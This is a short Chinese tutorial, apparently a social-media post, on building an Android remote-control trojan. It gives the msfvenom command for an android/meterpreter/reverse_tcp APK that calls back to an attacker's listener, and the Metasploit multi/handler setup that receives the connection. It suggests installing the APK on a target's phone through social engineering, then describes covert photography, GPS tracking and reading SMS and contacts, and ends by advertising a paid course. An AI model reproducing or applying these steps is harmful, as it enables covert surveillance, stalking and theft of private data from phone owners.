用于网络安全教学，切勿用于不当目的！

大多数情况下，安卓手机在安装了恶意程序后，或多或少都会被远控，那么攻击者在后台通过指令获取目标安卓手机的远程静默拍照、录像、录音、定位、获取通讯录和短信真的是不在话下了，下文我们就来探讨下这种技术。

Msfvenom

Kali中的metasploit有一个工具，名为msfvenom，可以生成众多版本的有效载荷，也就是可执行远控。

比如，我们可以将生成的安卓apk可执行程序经过社工，安装在目标手机中，即可完成长期监听或跟踪。那如何实现呢？这里我们就要用到msfvenom，接下来我们看看使用的方法。

生成安卓远控

• kali终端下输入：

msfvenom -h 查看使用帮助

其中我们要关注的参数是，-p（指定攻击有效载荷）-f（指定生成文件的格式）

msfvenom -l payloads
msfvenom -l formats

• 生成远控的完整命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

这里没有使用-f参数，生成安卓可执行程序，可以不用。

• 部署可执行程序

将生成的安卓远控app安装在目标靶机中，可以通过搭建服务器，让目标下载安装apk。

使用metasploit进行监听

启动msf

Kali终端下输入：msfconsole

继续输入：

use exploit/multi/handler

本模块专门用于设置独立的连接受理程序，这是我们寻找的最后一块拼图！在这种使用远控载荷的情况下，设置multi/handler是必须的，否则无法进程远程控制。

为该模块设置参数：

show options
set LHOST 192.168.31.111
set lport 8888

这里的设置必须和前面用msfvenom的设置保持一致。

run
执行侦听，等待上线

• 得到meterpreter会话

一旦目标安卓手机（靶机）用户点击了我们生成的test.apk图标，我们的kali就会监听到连接信号，得到一个远程控制目标（靶机）手机的meterpreter会话。

输入"？"即可显示所有远程控制安卓手机的命令，我们这里选择最精彩的三个：

远程拍照：目标手机不会有任何察觉，属于后台系统拍照；

gps定位：直接显示经纬度地理位置，非常精准；

查看短信与通讯录；

由于平台原因，就不明示写出命令了。如需完整学习安卓嘿客，请进入我头条主页，找到相应专栏加入学习吧！

推荐阅读：最好的操作系统